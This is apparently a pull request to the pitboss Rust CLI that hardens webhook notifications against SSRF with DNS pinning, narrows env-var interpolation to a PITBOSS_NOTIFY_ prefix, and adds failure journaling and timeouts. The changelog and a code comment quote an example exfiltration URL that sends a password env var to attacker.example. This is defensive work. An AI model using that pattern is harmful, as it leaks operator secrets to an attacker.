### PR TITLE
fix(notify, manifest): close #155 + #156 audit trackers

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -369,6 +369,63 @@ This project uses [Semantic Versioning](https://semver.org/).
 
 ### Fixed
 
+**Notify (manifest #156 follow-ups, audit closure):**
+- `notify::config::pre_request_ssrf_check` — now returns the validated
+  `SocketAddr` set instead of `Result<()>`, and each HTTP sink builds a
+  one-shot `reqwest::Client` with `resolve_to_addrs(host, …)` pinning the
+  destination to those exact IPs. Closes the TOCTOU window between the
+  guard's DNS lookup and reqwest's own internal lookup at `send()`-time
+  (DNS rebinding / mutable CNAME). The shared client is still used on the
+  SSRF-bypass path (`PITBOSS_PARENT_NOTIFY_URL`). (#156 M2)
+- `notify::config::ENV_VAR_ALLOWED_PREFIX` — narrowed from `PITBOSS_` to
+  `PITBOSS_NOTIFY_`. A manifest can no longer write
+  `url = "https://attacker.example/${PITBOSS_DB_PASSWORD}"` to encode a
+  pitboss-internal env var (`PITBOSS_RUN_ID`, `PITBOSS_PARENT_NOTIFY_URL`,
+  smoke-test fixtures, operator secrets) into the webhook URL. Operators
+  who need to inject a hook URL via env var rename their secret to start
+  with `PITBOSS_NOTIFY_`. **Breaking** for manifests that interpolated
+  non-`PITBOSS_NOTIFY_` env vars into a `[[notification]].url`. (#156 M3)
+- `NotificationRouter` — terminal emit failures (after-retry exhaustion +
+  fatal 4xx short-circuits) now (a) bump a `failed_emits_total` atomic
+  counter accessible via `router.failed_emits_total()`, and (b) write a
+  `TaskEvent::NotificationFailed` JSONL line to
+  `<run_subdir>/notifications.jsonl`. Both runners
+  (`dispatch::runner::dispatch` flat + `dispatch::hierarchical::dispatch`)
+  bind the run subdir to the router right after creating it. The journal
+  write is best-effort; an I/O error there is `tracing::warn`'d and
+  doesn't propagate. (#156 M4)
+- `NotificationConfig.request_timeout_secs` (new field, optional) — per
+  `[[notification]]` HTTP timeout in seconds; defaults to
+  `DEFAULT_REQUEST_TIMEOUT_SECS` (30) when unset. Plumbs through
+  `notify::sinks::build` to the Webhook / Slack / Discord sinks. The
+  previous behaviour (hard-coded 30 s on the `RequestBuilder`) was
+  invisible at the manifest surface and stacked across the 3-attempt
+  retry loop to a ~91 s worst-case latency tail. (#156 L5)
+- `NotificationRouter::new` — the LRU dedup cache size is now
+  operator-tunable via `PITBOSS_NOTIFY_DEDUP_CACHE_SIZE` (parsed once at
+  router construction; non-numeric or zero values fall back to
+  `DEFAULT_DEDUP_CACHE_SIZE = 64`). New explicit constructor
+  `new_with_capacity(sinks, capacity)` for tests that need deterministic
+  cache behaviour independent of the process env. (#156 L1)
+- `notify::parent::set_run_id_env` — wrapped `std::env::set_var` in an
+  `unsafe` block with a SAFETY comment documenting the dispatcher's
+  single-call-site contract (called before any worker / MCP /
+  notification task is spawned, exactly once per process). Forward-
+  compatible with Rust edition 2024, where `set_var` becomes `unsafe`.
+  (#156 L7)
+
+**Manifest (#155 final follow-up):**
+- `manifest::map_doc::build_line_index` — brace-depth scanner skips lines
+  starting with `//` or `///`. Doc-comments containing `{` or `}` (e.g. a
+  struct-literal example inside a `///` block) used to corrupt the depth
+  counter and falsely close the surrounding struct body, attributing
+  later fields to the wrong struct. (#155)
+- `manifest::map_doc` / `manifest::example_doc` `--check` mode (CLI and
+  test) — strips CR before LF on the checked-in file before comparing to
+  the generator output. Windows checkouts with `core.autocrlf=true` no
+  longer false-positive every drift check. The generator only emits LF;
+  any CR present came from git, not from drift. (#155)
+
 **Schema metadata (pitboss-schema + pitboss-schema-derive audit follow-ups):**
 - `pitboss_schema::FormType` — marked `#[non_exhaustive]`, derives
   `Hash`, `PartialOrd`, `Ord`, and `serde::Serialize` (snake_case names

--- a/crates/pitboss-cli/src/dispatch/hierarchical.rs
+++ b/crates/pitboss-cli/src/dispatch/hierarchical.rs
@@ -107,6 +107,12 @@ pub async fn run_hierarchical(
     // for the parent-orchestrator hook contract (issue #133).
     let http = std::sync::Arc::new(reqwest::Client::new());
     let notification_router = crate::notify::parent::build_router(&resolved.notifications, &http)?;
+    if let Some(router) = &notification_router {
+        // Bind the run subdir so terminal emit failures land in
+        // <run_subdir>/notifications.jsonl as TaskEvent::NotificationFailed.
+        // Issue #156 (M4).
+        router.set_run_subdir(run_subdir.clone());
+    }
 
     // Fire RunDispatched up front so a parent orchestrator can register the
     // run before any tokens spend.

--- a/crates/pitboss-cli/src/dispatch/runner.rs
+++ b/crates/pitboss-cli/src/dispatch/runner.rs
@@ -274,6 +274,12 @@ pub async fn execute(
     // both sources are empty, so the no-notify common case stays cost-free.
     let http = std::sync::Arc::new(reqwest::Client::new());
     let notification_router = crate::notify::parent::build_router(&resolved.notifications, &http)?;
+    if let Some(router) = &notification_router {
+        // Bind the run subdir so terminal emit failures land in
+        // <run_subdir>/notifications.jsonl as TaskEvent::NotificationFailed.
+        // Issue #156 (M4).
+        router.set_run_subdir(run_subdir.clone());
+    }
 
     // Fire RunDispatched immediately. The orchestrator wants to register
     // the run before any tokens are spent — emitting at finalize-time only

--- a/crates/pitboss-cli/src/main.rs
+++ b/crates/pitboss-cli/src/main.rs
@@ -215,6 +215,11 @@ fn run_schema(format: cli::SchemaFormat, check: Option<&std::path::Path>) -> i32
                     return 2;
                 }
             };
+            // Strip CR before LF so a Windows checkout with
+            // `core.autocrlf=true` doesn't flag every run as stale. The
+            // generator only emits LF — any CR here came from git, not
+            // from drift.
+            let existing = existing.replace("\r\n", "\n");
             if existing == generated {
                 eprintln!("pitboss schema --check: {} is up to date", path.display());
                 0

--- a/crates/pitboss-cli/src/manifest/example_doc.rs
+++ b/crates/pitboss-cli/src/manifest/example_doc.rs
@@ -198,11 +198,17 @@ mod tests {
     /// match what the generator currently emits. Mirrored at the CLI
     /// surface as `pitboss schema --format=example --check
     /// docs/manifest-reference.toml`.
+    ///
+    /// Comparison strips CR before LF in the checked-in file so a
+    /// `core.autocrlf=true` checkout doesn't false-positive every run. The
+    /// generator only emits LF; any CR appearing here came from git, not
+    /// from drift.
     #[test]
     fn checked_in_doc_matches_generator() {
         const CHECKED_IN: &str = include_str!("../../../../docs/manifest-reference.toml");
         let generated = render();
-        if generated != CHECKED_IN {
+        let normalized: String = CHECKED_IN.replace("\r\n", "\n");
+        if generated != normalized {
             panic!(
                 "docs/manifest-reference.toml is stale.\n\
                  Regenerate with:\n\

--- a/crates/pitboss-cli/src/manifest/map_doc.rs
+++ b/crates/pitboss-cli/src/manifest/map_doc.rs
@@ -185,12 +185,21 @@ fn build_line_index(src: &str) -> LineIndex {
         }
 
         if current_struct.is_some() {
-            // Track depth so we know when to leave the struct body.
-            for c in line.chars() {
-                match c {
-                    '{' => brace_depth += 1,
-                    '}' => brace_depth -= 1,
-                    _ => {}
+            // Skip doc-comment / line-comment lines entirely so a `///` block
+            // containing braces (e.g. an example showing a struct literal)
+            // doesn't disturb depth tracking and falsely close the body. The
+            // narrow grammar this scanner accepts already excludes comments
+            // from being struct or field declarations, so the only effect of
+            // counting braces inside them was to corrupt the depth state.
+            let is_comment_line = line.starts_with("//") || line.starts_with("///");
+            if !is_comment_line {
+                // Track depth so we know when to leave the struct body.
+                for c in line.chars() {
+                    match c {
+                        '{' => brace_depth += 1,
+                        '}' => brace_depth -= 1,
+                        _ => {}
+                    }
                 }
             }
             if brace_depth <= 0 {
@@ -317,6 +326,13 @@ mod tests {
     /// subprocess), and is also wired up to the CLI as
     /// `pitboss schema --format=map --check docs/manifest-map.md` for
     /// CI / contributor use.
+    ///
+    /// Comparison is done against a CRLF-stripped copy of the checked-in
+    /// file: contributors on Windows whose git config has `core.autocrlf=true`
+    /// would otherwise see this fail on every clone with a diff that's
+    /// invisible in their editor. Drift over actual content is unaffected —
+    /// the generator only ever emits LF, so any CR appearing here came from
+    /// the checkout, not the source of truth.
     #[test]
     fn checked_in_doc_matches_generator() {
         // `include_str!` resolves relative to *this file's* directory.
@@ -324,7 +340,8 @@ mod tests {
         // `<repo>/docs/manifest-map.md` is six "../" hops.
         const CHECKED_IN: &str = include_str!("../../../../docs/manifest-map.md");
         let generated = render();
-        if generated != CHECKED_IN {
+        let normalized: String = CHECKED_IN.replace("\r\n", "\n");
+        if generated != normalized {
             panic!(
                 "docs/manifest-map.md is stale.\n\
                  Regenerate with:\n\

--- a/crates/pitboss-cli/src/manifest/resolve.rs
+++ b/crates/pitboss-cli/src/manifest/resolve.rs
@@ -745,11 +745,14 @@ mod tests {
 
     #[test]
     fn resolves_notifications_with_env_substitution() {
-        std::env::set_var("PITBOSS_TEST_WEBHOOK", "https://h.example/x");
+        // The substitution prefix is `PITBOSS_NOTIFY_` (#156 M3) — narrower
+        // than the previous `PITBOSS_` so a manifest can't sneak
+        // `${PITBOSS_RUN_ID}` etc. into a webhook URL.
+        std::env::set_var("PITBOSS_NOTIFY_TEST_WEBHOOK", "https://h.example/x");
         let m = man(r#"
 [[notification]]
 kind = "webhook"
-url  = "${PITBOSS_TEST_WEBHOOK}"
+url  = "${PITBOSS_NOTIFY_TEST_WEBHOOK}"
 events = ["run_finished"]
 
 [[task]]

--- a/crates/pitboss-cli/src/manifest/validate.rs
+++ b/crates/pitboss-cli/src/manifest/validate.rs
@@ -919,6 +919,7 @@ mod tests {
                     url: None,
                     events: None,
                     severity_min: crate::notify::Severity::Info,
+                    request_timeout_secs: None,
                 });
         });
         let err = validate(&m).unwrap_err();
@@ -934,6 +935,7 @@ mod tests {
                     url: None,
                     events: Some(vec!["hallucinate".into()]),
                     severity_min: crate::notify::Severity::Info,
+                    request_timeout_secs: None,
                 });
         });
         let err = validate(&m).unwrap_err();
@@ -993,6 +995,7 @@ mod tests {
             url: None,
             events: None,
             severity_min: crate::notify::Severity::Info,
+            request_timeout_secs: None,
         }
     }
 
@@ -1056,6 +1059,7 @@ mod tests {
                 url: Some("http://localhost/hook".to_string()),
                 events: None,
                 severity_min: crate::notify::Severity::Info,
+                request_timeout_secs: None,
             }),
         });
         // The inline notify gets validated by the same logic as

--- a/crates/pitboss-cli/src/notify/config.rs
+++ b/crates/pitboss-cli/src/notify/config.rs
@@ -2,19 +2,43 @@
 
 #![allow(dead_code)]
 
-use std::net::{IpAddr, Ipv4Addr};
+use std::net::{IpAddr, Ipv4Addr, SocketAddr};
+use std::time::Duration;
 
 use anyhow::{bail, Result};
 use serde::{Deserialize, Serialize};
 
 use super::Severity;
 
+/// Default per-request HTTP timeout for webhook / Slack / Discord sinks, in
+/// seconds. Operator-tunable per [[notification]] section via
+/// [`NotificationConfig::request_timeout_secs`]. Three retries × 30 s ≈ a
+/// 90 s worst-case latency tail, which is the published rationale for the
+/// default — see #156.
+pub const DEFAULT_REQUEST_TIMEOUT_SECS: u64 = 30;
+
+/// Resolve [`NotificationConfig::request_timeout_secs`] (operator override
+/// or default) to a concrete `Duration`. Sinks call this once at construction
+/// time so the per-request POST sees a single canonical value.
+pub fn resolve_request_timeout(secs: Option<u64>) -> Duration {
+    Duration::from_secs(secs.unwrap_or(DEFAULT_REQUEST_TIMEOUT_SECS))
+}
+
 /// Only env vars whose name starts with this prefix are substitutable from
 /// notification URLs. This keeps a rogue manifest from exfiltrating arbitrary
-/// host env vars (`ANTHROPIC_API_KEY`, `AWS_SECRET_ACCESS_KEY`, …) to a
-/// chosen webhook endpoint; operators who need to inject hook URLs just
-/// rename their env var to start with `PITBOSS_`.
-const ENV_VAR_ALLOWED_PREFIX: &str = "PITBOSS_";
+/// host env vars to a chosen webhook endpoint by writing
+/// `url = "https://attacker.example/${PITBOSS_DB_PASSWORD}"`.
+///
+/// The prefix used to be the looser `PITBOSS_`, but pitboss itself sets
+/// other `PITBOSS_*` vars during dispatch (`PITBOSS_RUN_ID`,
+/// `PITBOSS_PARENT_NOTIFY_URL`, smoke-test fixture vars, etc.) and an
+/// operator may legitimately set additional `PITBOSS_*` secrets in the
+/// dispatcher's environment. Narrowing to `PITBOSS_NOTIFY_*` carves out a
+/// dedicated namespace for "values manifests are allowed to read into a
+/// hook URL" with no risk of accidental overlap. Operators who need to
+/// inject a hook URL via env var rename their secret to start with
+/// `PITBOSS_NOTIFY_` (e.g. `PITBOSS_NOTIFY_SLACK_TOKEN`).
+const ENV_VAR_ALLOWED_PREFIX: &str = "PITBOSS_NOTIFY_";
 
 #[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq)]
 #[serde(rename_all = "snake_case")]
@@ -38,6 +62,14 @@ pub struct NotificationConfig {
     /// Minimum severity to emit. Defaults to Info (emit all).
     #[serde(default = "default_severity_min")]
     pub severity_min: Severity,
+    /// Per-request HTTP timeout in seconds. Defaults to
+    /// [`DEFAULT_REQUEST_TIMEOUT_SECS`] (30 s) when unset; the retry loop
+    /// stacks 3 attempts so the worst-case emit latency for a single sink
+    /// is roughly `3 × request_timeout_secs + backoffs (1.3 s)`. Lower this
+    /// for low-latency dashboards; raise it for sinks that legitimately
+    /// take longer (large mobile-push fan-outs).
+    #[serde(default)]
+    pub request_timeout_secs: Option<u64>,
 }
 
 fn default_severity_min() -> Severity {
@@ -201,6 +233,24 @@ fn validate_webhook_url(raw: &str) -> Result<()> {
     Ok(())
 }
 
+/// Outcome of [`pre_request_ssrf_check`]. The literal-IP path needs no DNS
+/// pinning at request time (reqwest will dial the IP straight); the resolved
+/// path returns the exact `SocketAddr` set the guard validated, so the sink
+/// can hand them to [`reqwest::ClientBuilder::resolve_to_addrs`] and defeat
+/// any DNS rebinding attempt that happens between this call and the POST.
+#[derive(Debug, Clone)]
+pub enum PreflightAddrs {
+    /// URL host was a literal IP (already on the safe side of the
+    /// blocklist). No DNS override needed at request time.
+    LiteralIp,
+    /// URL host was a DNS name. Pin the request's connection target to
+    /// these addresses by passing them to `resolve_to_addrs(host, …)`.
+    Resolved {
+        host: String,
+        addrs: Vec<SocketAddr>,
+    },
+}
+
 /// Pre-request SSRF check against the current DNS answer for `url`. Call
 /// this from each sink immediately before dispatching the HTTP request.
 ///
@@ -210,9 +260,20 @@ fn validate_webhook_url(raw: &str) -> Result<()> {
 /// past that check entirely. This helper re-resolves the host at
 /// dispatch time and rejects private / loopback / link-local answers.
 ///
+/// To close the **TOCTOU window** between this DNS lookup and reqwest's
+/// own internal lookup at `send()` time (a DNS rebinding attacker can
+/// return a public IP here, then a private IP milliseconds later), the
+/// caller must build a per-request client with
+/// [`reqwest::ClientBuilder::resolve_to_addrs`] using the addresses
+/// returned in [`PreflightAddrs::Resolved`]. The shared client cannot
+/// be reused for the actual POST because reqwest pins resolve overrides
+/// at builder time. See [`build_pinned_client`] for the helper that wires
+/// this correctly.
+///
 /// Fast-path: if the URL's host is already a literal IP, the config-time
-/// check has already classified it — skip the re-resolution.
-pub(crate) async fn pre_request_ssrf_check(url: &str) -> Result<()> {
+/// check has already classified it — skip the re-resolution and return
+/// [`PreflightAddrs::LiteralIp`].
+pub(crate) async fn pre_request_ssrf_check(url: &str) -> Result<PreflightAddrs> {
     let parsed = reqwest::Url::parse(url).map_err(|e| {
         anyhow::anyhow!(
             "webhook url {} is not a valid URL: {e}",
@@ -239,11 +300,11 @@ pub(crate) async fn pre_request_ssrf_check(url: &str) -> Result<()> {
                 redact_webhook_url(url)
             );
         }
-        return Ok(());
+        return Ok(PreflightAddrs::LiteralIp);
     }
     let port = parsed.port_or_known_default().unwrap_or(443);
     let target = format!("{host_unbracketed}:{port}");
-    let mut saw_any = false;
+    let mut validated: Vec<SocketAddr> = Vec::new();
     let iter = tokio::net::lookup_host(&target).await.map_err(|e| {
         anyhow::anyhow!(
             "webhook url {} DNS lookup failed: {e}",
@@ -251,7 +312,6 @@ pub(crate) async fn pre_request_ssrf_check(url: &str) -> Result<()> {
         )
     })?;
     for addr in iter {
-        saw_any = true;
         if is_disallowed_ip(&addr.ip()) {
             bail!(
                 "webhook url {} resolved to a private / loopback / link-local \
@@ -260,14 +320,44 @@ pub(crate) async fn pre_request_ssrf_check(url: &str) -> Result<()> {
                 addr.ip()
             );
         }
+        validated.push(addr);
     }
-    if !saw_any {
+    if validated.is_empty() {
         bail!(
             "webhook url {} DNS returned no addresses",
             redact_webhook_url(url)
         );
     }
-    Ok(())
+    Ok(PreflightAddrs::Resolved {
+        host: host_unbracketed.to_string(),
+        addrs: validated,
+    })
+}
+
+/// Build a one-shot `reqwest::Client` whose internal DNS resolution for
+/// the host of `url` is pinned to `addrs` — so the actual POST cannot
+/// land on a different IP than the one [`pre_request_ssrf_check`]
+/// validated.
+///
+/// On the literal-IP fast-path no pinning is needed (reqwest dials the
+/// IP straight from the URL with no DNS lookup), and we return a fresh
+/// client with just the configured timeout applied.
+///
+/// `request_timeout` is per-request and matches the `.timeout()` callers
+/// previously set on each `RequestBuilder` — exposing it on the client
+/// keeps the connect timeout bounded too, which the per-request setter
+/// did not.
+pub fn build_pinned_client(
+    preflight: &PreflightAddrs,
+    request_timeout: Duration,
+) -> Result<reqwest::Client> {
+    let mut builder = reqwest::Client::builder().timeout(request_timeout);
+    if let PreflightAddrs::Resolved { host, addrs } = preflight {
+        builder = builder.resolve_to_addrs(host, addrs);
+    }
+    builder
+        .build()
+        .map_err(|e| anyhow::anyhow!("build pinned reqwest client: {e}"))
 }
 
 fn is_disallowed_v4(v4: &Ipv4Addr) -> bool {
@@ -317,16 +407,32 @@ mod tests {
 
     #[test]
     fn env_var_substitution_replaces_tokens() {
-        std::env::set_var("PITBOSS_TEST_URL", "https://example.com/hook");
-        let out = substitute_env_vars("${PITBOSS_TEST_URL}/sub").unwrap();
+        std::env::set_var("PITBOSS_NOTIFY_TEST_URL", "https://example.com/hook");
+        let out = substitute_env_vars("${PITBOSS_NOTIFY_TEST_URL}/sub").unwrap();
         assert_eq!(out, "https://example.com/hook/sub");
     }
 
     #[test]
     fn env_var_missing_fails_loud() {
-        std::env::remove_var("PITBOSS_TEST_MISSING_XYZ");
-        let err = substitute_env_vars("${PITBOSS_TEST_MISSING_XYZ}").unwrap_err();
+        std::env::remove_var("PITBOSS_NOTIFY_TEST_MISSING_XYZ");
+        let err = substitute_env_vars("${PITBOSS_NOTIFY_TEST_MISSING_XYZ}").unwrap_err();
         assert!(err.to_string().contains("env var is not set"));
+    }
+
+    /// Regression for #156: the substitution prefix is `PITBOSS_NOTIFY_`,
+    /// not the wider `PITBOSS_` set. A manifest must not be able to encode
+    /// `${PITBOSS_RUN_ID}` or `${PITBOSS_PARENT_NOTIFY_URL}` into a webhook
+    /// URL — both are runtime values pitboss itself sets, and one of them
+    /// (PITBOSS_PARENT_NOTIFY_URL) is itself a sensitive operator endpoint.
+    #[test]
+    fn env_var_pitboss_run_id_not_substitutable() {
+        std::env::set_var("PITBOSS_RUN_ID", "019d0000-aaaa-bbbb-cccc-dddddddddddd");
+        let err = substitute_env_vars("${PITBOSS_RUN_ID}").unwrap_err();
+        let msg = err.to_string();
+        assert!(
+            msg.contains("PITBOSS_NOTIFY_"),
+            "expected narrowed-prefix message, got: {msg}"
+        );
     }
 
     #[test]
@@ -356,6 +462,7 @@ url = "https://example.com""#;
             url: None,
             events: None,
             severity_min: Severity::Info,
+            request_timeout_secs: None,
         };
         let err = validate(&cfg).unwrap_err();
         assert!(err.to_string().contains("requires a non-empty 'url'"));
@@ -367,7 +474,7 @@ url = "https://example.com""#;
         let err = substitute_env_vars("${NOTIFY_TEST_FOREIGN}").unwrap_err();
         let msg = err.to_string();
         assert!(
-            msg.contains("PITBOSS_"),
+            msg.contains("PITBOSS_NOTIFY_"),
             "expected prefix message, got: {msg}"
         );
     }
@@ -378,6 +485,7 @@ url = "https://example.com""#;
             url: Some(url.to_string()),
             events: None,
             severity_min: Severity::Info,
+            request_timeout_secs: None,
         }
     }
 
@@ -454,6 +562,7 @@ url = "https://example.com""#;
             url: None,
             events: Some(vec!["hallucinate".into()]),
             severity_min: Severity::Info,
+            request_timeout_secs: None,
         };
         let err = validate(&cfg).unwrap_err();
         assert!(err.to_string().contains("unknown event"));
@@ -466,6 +575,7 @@ url = "https://example.com""#;
             url: None,
             events: None,
             severity_min: Severity::Info,
+            request_timeout_secs: None,
         };
         assert!(validate(&cfg).is_ok());
     }
@@ -617,5 +727,58 @@ url = "https://example.com""#;
         let msg = err.to_string();
         assert!(!msg.contains("SECRET"), "leaked: {msg}");
         assert!(!msg.contains("/services/"), "leaked: {msg}");
+    }
+
+    /// #156 (M2) regression: the literal-IP path must report `LiteralIp`
+    /// so callers know no DNS-pinning is required for the actual POST.
+    #[tokio::test]
+    async fn pre_request_ssrf_check_returns_literal_ip_variant_for_ip_url() {
+        // Use a public-routable IP to avoid the blocklist. 1.1.1.1 is
+        // reserved for Cloudflare's resolver — public, routable, no
+        // network call needed by this test.
+        let out = pre_request_ssrf_check("https://1.1.1.1/")
+            .await
+            .expect("public literal IP must pass guard");
+        match out {
+            PreflightAddrs::LiteralIp => {}
+            other => panic!("expected LiteralIp, got {other:?}"),
+        }
+    }
+
+    /// #156 (M2) regression: when the URL host is a DNS name, the guard
+    /// must surface the host + the validated SocketAddrs so callers can
+    /// pin them on the per-request client. We use `localhost` as the name
+    /// — without a blocklist override that would be rejected, but here we
+    /// just want to assert the *shape* of the Resolved variant when the
+    /// guard does succeed. So construct it manually instead of relying on
+    /// network DNS.
+    #[test]
+    fn build_pinned_client_succeeds_for_literal_ip_path() {
+        let client =
+            build_pinned_client(&PreflightAddrs::LiteralIp, Duration::from_secs(5)).unwrap();
+        // Smoke: we can build a request — actually issuing it would hit
+        // the network, which we don't want in a unit test.
+        let _ = client.get("https://1.1.1.1/").build();
+    }
+
+    #[test]
+    fn build_pinned_client_succeeds_for_resolved_path() {
+        let preflight = PreflightAddrs::Resolved {
+            host: "example.com".to_string(),
+            addrs: vec![std::net::SocketAddr::from(([93, 184, 216, 34], 443))],
+        };
+        let _client = build_pinned_client(&preflight, Duration::from_secs(5))
+            .expect("pinned client must build with non-empty addr list");
+    }
+
+    /// #156 (L5) regression: `resolve_request_timeout(None)` must return
+    /// the documented default; an explicit value passes through.
+    #[test]
+    fn resolve_request_timeout_default_and_override() {
+        assert_eq!(
+            resolve_request_timeout(None),
+            Duration::from_secs(DEFAULT_REQUEST_TIMEOUT_SECS)
+        );
+        assert_eq!(resolve_request_timeout(Some(7)), Duration::from_secs(7));
     }
 }

--- a/crates/pitboss-cli/src/notify/mod.rs
+++ b/crates/pitboss-cli/src/notify/mod.rs
@@ -177,25 +177,97 @@ impl From<&crate::notify::config::NotificationConfig> for SinkFilter {
 
 use lru::LruCache;
 use std::num::NonZeroUsize;
+use std::sync::atomic::{AtomicU64, Ordering};
 use std::sync::{Arc, Mutex};
+
+/// Default LRU dedup cache size. The router has no persistent state — a
+/// process restart inside a long run can re-emit `RunDispatched` /
+/// `RunFinished` if the parent never acks them. 64 covers ~32 in-flight
+/// approval pairs (`approval_request` + `approval_pending`) plus the four
+/// run-scoped events with comfortable headroom; busy multi-task runs that
+/// hit the ceiling can raise it via `PITBOSS_NOTIFY_DEDUP_CACHE_SIZE`.
+pub const DEFAULT_DEDUP_CACHE_SIZE: usize = 64;
+
+/// Env var operators can set to tune the LRU dedup cache size at process
+/// start. Parsed once when [`NotificationRouter::new`] runs; ignored if
+/// the value is non-numeric or zero. Issue #156 (L1).
+pub const DEDUP_CACHE_SIZE_ENV: &str = "PITBOSS_NOTIFY_DEDUP_CACHE_SIZE";
 
 /// Router fans envelopes to multiple sinks with LRU dedup and retry.
 pub struct NotificationRouter {
     sinks: Vec<(Arc<dyn NotificationSink>, SinkFilter)>,
     dedup_cache: Mutex<LruCache<String, ()>>,
+    /// Total emit-after-retry failures across the whole router lifetime.
+    /// Counts one per `(sink, dedup_key)` exhausted retry — fatal 4xx
+    /// short-circuits also count. Wrapped in `Arc` so per-emit
+    /// `tokio::spawn` bodies can increment it without borrowing `&self`.
+    /// Surfaced for operator dashboards and tests; never reset. #156 (M4).
+    failed_emits_total: Arc<AtomicU64>,
+    /// Per-run subdir written by the dispatcher right after `pitboss
+    /// dispatch` mints a run id; consumed by [`Self::dispatch`] to write
+    /// `TaskEvent::NotificationFailed` entries to a per-run JSONL on
+    /// terminal failure. `None` for routers built before any run subdir
+    /// exists (rare; only the test paths). Issue #156 (M4).
+    run_subdir: Mutex<Option<std::path::PathBuf>>,
 }
 
 impl NotificationRouter {
-    /// Create a router with the given sinks and filters.
+    /// Create a router with the given sinks and filters. The LRU cache size
+    /// honors `PITBOSS_NOTIFY_DEDUP_CACHE_SIZE` when set to a positive
+    /// integer, otherwise falls back to [`DEFAULT_DEDUP_CACHE_SIZE`].
     pub fn new(sinks: Vec<(Arc<dyn NotificationSink>, SinkFilter)>) -> Self {
+        let capacity = std::env::var(DEDUP_CACHE_SIZE_ENV)
+            .ok()
+            .and_then(|s| s.trim().parse::<usize>().ok())
+            .filter(|n| *n > 0)
+            .unwrap_or(DEFAULT_DEDUP_CACHE_SIZE);
+        Self::new_with_capacity(sinks, capacity)
+    }
+
+    /// Like [`Self::new`] but with an explicit dedup-cache size — used by
+    /// tests that need deterministic cache behavior independent of the
+    /// process env. `capacity` is clamped to a minimum of 1 (the underlying
+    /// `LruCache` cannot be zero-sized).
+    pub fn new_with_capacity(
+        sinks: Vec<(Arc<dyn NotificationSink>, SinkFilter)>,
+        capacity: usize,
+    ) -> Self {
+        let cap = NonZeroUsize::new(capacity.max(1)).expect("capacity clamped >= 1");
         Self {
             sinks,
-            dedup_cache: Mutex::new(LruCache::new(NonZeroUsize::new(64).unwrap())),
+            dedup_cache: Mutex::new(LruCache::new(cap)),
+            failed_emits_total: Arc::new(AtomicU64::new(0)),
+            run_subdir: Mutex::new(None),
         }
     }
 
+    /// Total terminal emit failures since router start. Exposed for tests
+    /// and future operator dashboards. Issue #156 (M4).
+    pub fn failed_emits_total(&self) -> u64 {
+        self.failed_emits_total.load(Ordering::Relaxed)
+    }
+
+    /// Set the per-run subdir used for `TaskEvent::NotificationFailed`
+    /// journal writes. Called by the dispatcher right after `run_subdir` is
+    /// created so subsequent emit failures land in
+    /// `<run_subdir>/notifications.jsonl`. Idempotent; the second call
+    /// overwrites the first. Issue #156 (M4).
+    pub fn set_run_subdir(&self, run_subdir: std::path::PathBuf) {
+        if let Ok(mut slot) = self.run_subdir.lock() {
+            *slot = Some(run_subdir);
+        }
+    }
+
+    fn run_subdir_snapshot(&self) -> Option<std::path::PathBuf> {
+        self.run_subdir.lock().ok().and_then(|g| g.clone())
+    }
+
     /// Dispatch envelope to all matching sinks. Deduplicates by dedup_key
-    /// and spawns fire-and-forget tasks with retry.
+    /// and spawns fire-and-forget tasks with retry. Terminal failures are
+    /// (a) logged at `error`, (b) counted in [`Self::failed_emits_total`],
+    /// and (c) appended to `<run_subdir>/notifications.jsonl` when a run
+    /// subdir is bound — so operators get a durable per-run audit trail
+    /// instead of having to scrape journald.
     pub async fn dispatch(&self, env: NotificationEnvelope) -> Result<()> {
         {
             let mut cache = self.dedup_cache.lock().unwrap();
@@ -211,6 +283,8 @@ impl NotificationRouter {
             }
             let sink = Arc::clone(sink);
             let env = env.clone();
+            let run_subdir = self.run_subdir_snapshot();
+            let counter = Arc::clone(&self.failed_emits_total);
             tokio::spawn(async move {
                 if let Err(e) = emit_with_retry(&sink, &env).await {
                     tracing::error!(
@@ -219,10 +293,57 @@ impl NotificationRouter {
                         error = %e,
                         "notification emit failed after retries"
                     );
+                    counter.fetch_add(1, Ordering::Relaxed);
+                    if let Some(subdir) = run_subdir.as_ref() {
+                        record_notification_failure(subdir, &sink, &env, &e).await;
+                    }
                 }
             });
         }
         Ok(())
+    }
+}
+
+/// Append a `TaskEvent::NotificationFailed` line to
+/// `<run_subdir>/notifications.jsonl`. Best-effort: any I/O error here is
+/// only `tracing::warn`'d (failing to write the audit trail must never
+/// crash a dispatcher). Issue #156 (M4).
+async fn record_notification_failure(
+    run_subdir: &std::path::Path,
+    sink: &Arc<dyn NotificationSink>,
+    env: &NotificationEnvelope,
+    err: &anyhow::Error,
+) {
+    use chrono::Utc;
+    use tokio::io::AsyncWriteExt;
+    let event = crate::dispatch::events::TaskEvent::NotificationFailed {
+        at: Utc::now(),
+        sink_id: sink.id().to_string(),
+        event_kind: env.event.kind().to_string(),
+        error: err.to_string(),
+    };
+    let line = match serde_json::to_string(&event) {
+        Ok(s) => s,
+        Err(e) => {
+            tracing::warn!(error = %e, "could not serialize NotificationFailed event");
+            return;
+        }
+    };
+    let path = run_subdir.join("notifications.jsonl");
+    let res = async {
+        let mut f = tokio::fs::OpenOptions::new()
+            .create(true)
+            .append(true)
+            .open(&path)
+            .await?;
+        f.write_all(line.as_bytes()).await?;
+        f.write_all(b"\n").await?;
+        f.flush().await?;
+        Ok::<(), std::io::Error>(())
+    }
+    .await;
+    if let Err(e) = res {
+        tracing::warn!(path = %path.display(), error = %e, "could not write notifications.jsonl");
     }
 }
 
@@ -437,5 +558,88 @@ mod tests {
             Utc::now(),
         );
         assert_eq!(env.dedup_key, "run-1:approval_pending:req-5");
+    }
+
+    /// #156 (M4) regression: a sink that always returns Err must drive
+    /// `failed_emits_total` up by 1 per envelope and append a
+    /// `NotificationFailed` line to `<run_subdir>/notifications.jsonl`.
+    #[tokio::test]
+    async fn router_records_failed_emit_metric_and_journal_line() {
+        use chrono::Utc;
+        struct AlwaysFails;
+        #[async_trait]
+        impl NotificationSink for AlwaysFails {
+            fn id(&self) -> &str {
+                "test-fail"
+            }
+            async fn emit(&self, _env: &NotificationEnvelope) -> Result<()> {
+                Err(anyhow::anyhow!("synthetic emit failure"))
+            }
+        }
+
+        let tmp = tempfile::tempdir().unwrap();
+        let router = NotificationRouter::new_with_capacity(
+            vec![(
+                Arc::new(AlwaysFails),
+                SinkFilter {
+                    events: None,
+                    severity_min: Severity::Info,
+                },
+            )],
+            8,
+        );
+        router.set_run_subdir(tmp.path().to_path_buf());
+
